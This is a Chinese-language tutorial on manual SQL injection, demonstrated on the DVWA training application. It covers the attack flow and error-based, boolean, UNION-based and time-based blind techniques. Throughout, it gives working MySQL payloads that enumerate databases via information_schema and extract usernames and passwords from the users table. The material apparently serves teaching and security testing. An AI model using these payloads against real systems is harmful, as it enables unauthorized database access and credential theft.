SQL注入：SQL注入类型（手动）SQL注入的检测

一、SQL注入流程

1、判断是否有SQL注入漏洞（检测）

2、判断操作系统、数据库和web应用类型

3、获取数据库信息，包括管理员信息及拖库

4、加密信息破解，sqlmap可自动破解

5、提升权限，获得sql-shell、os-shell、登录应用后台

二、SQL注入类型（手动）

1、基于错误的注入

错误注入的思路是通过构造特殊的sql语句，根据得到的错误信息，确认sql注入点

通过数据库报错信息，也可以探测到数据库的类型和其他有用信息（可能能得到）

通过输入英文单引号，触发数据库异常，通过异常日志诊断数据库类型（可能能得到语法错误信息）

SQL注入语句解析：

select first_name,last_name from dvwa.users where user_id='1'; --输入1

select first_name,last_name from dvwa.users where user_id='''; --输入'

PS:SQL注入检测

2、基于布尔的注入

布尔逻辑注入的思想是闭合SQL语句、构造or和and逻辑语句、注释多余的代码。MySQL的注释标识符有两种：--、#

SQL注入语句解析：' or 1=1 --

select first_name,last_name from dvwa.users where user_id=' ' or 1=1 -- '

说明：

第一个'用于闭合前面的条件

or 1=1 为真的条件

--或者#将注释后面的所有语句

3、基于UNION的注入

UNION语句用于联合前面的SELECT查询语句，合并查询更多的信息；

一般通过错误和布尔注入确定注入点之后，便开始通过union语句来获取有效信息。

//猜测数据列数(方法1)

' union select 1 -- 查询失败

' union select 1,2 -- 查询成功

' union select 1,2,3 -- 查询失败

//猜测数据列数(方法2)

1' or 1=1 order by 1 # 查询成功

1' or 1=1 order by 2 # 查询成功

1' or 1=1 order by 3 # 查询失败

以上两个猜测可以确认执行的SQL查询语句中只有两个字段，即这里的first_name、last_name

SQL注入语句解析：猜字段sql

select first_name,last_name from dvwa.users where user_id=' ' union select 1 -- '

select first_name,last_name from dvwa.users where user_id=' ' union select 1,2 -- '

select first_name,last_name from dvwa.users where user_id=' ' union select 1,2,3 -- '

//获取当前数据库及用户信息

'union select version(),database() --'

'union select user(),database() --'

SQL注入语句解析：

select first_name,last_name from dvwa.users where user_id=' ' union select version(),database() -- '

select first_name,last_name from dvwa.users where user_id=' ' union select user(),database() -- '

说明：

version()获取数据库版本信息

database()获取当前数据库名

user()获取当前用户名

//查询数据库中的所有表

information_schema数据库是MySQL自带的，它提供了访问数据库元数据的方式；

元数据包括数据库名、表名、列数据类型、访问权限、字符集等基础信息

SQL注入语句解析：

select * from information_schema.TABLES\G

//查询所有库名

'union select TABLE_SCHEMA,1 from information_schema.TABLES --

select first_name,last_name from dvwa.users where user_id=' ' union select TABLE_SCHEMA,1 from information_schema.TABLES -- '

//查询所有库中所有表名

'union select TABLE_NAME,1 from information_schema.TABLES --

select first_name,last_name from dvwa.users where user_id=' ' union select TABLE_NAME,1 from information_schema.TABLES -- '

//同时查询表名及对应库名

'union select TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES --

select first_name,last_name from dvwa.users where user_id=' ' union select TABLE_SCHEMA,TABLE_NAME from information_schema.TABLES -- '

//原始语句

select first_name,last_name from dvwa.users where user_id='$id'

//查询数据列

'union select column_name,1 from information_schema.COLUMNS where table_name='users' --

select first_name,last_name from dvwa.users where user_id=' ' union select column_name,1 from information_schema.COLUMNS where table_name='users' --

//查询数据列

'union select NULL,user from users --'

'union select NULL,password from users --'

'union select user,password from users --'

'union select user,concat(first_name,' ',last_name,' ',user) from users --'

SQL语句解析：

select first_name,last_name from dvwa.users where user_id=' 'union select NULL,user from users --'

select first_name,last_name from dvwa.users where user_id=' 'union select NULL,password from users --'

select first_name,last_name from dvwa.users where user_id=' 'union select user,password from users --'

select first_name,last_name from dvwa.users where user_id=' 'union select user,concat(first_name,' ',last_name,' ',user) from users --'

4、基于时间的盲注

有些情况数据输入之后，结果并不会回显到前端界面，此时，通过设置sleep语句来探测注入点

1' and sleep(8) --'

SQL注入语句解析：

select first_name,last_name from dvwa.users where user_id='1' and sleep(8) --'

PS:SQL注入检测

三、SQL注入检测（手动）

SQL注入的检测方法：基于错误的注入和基于时间的盲注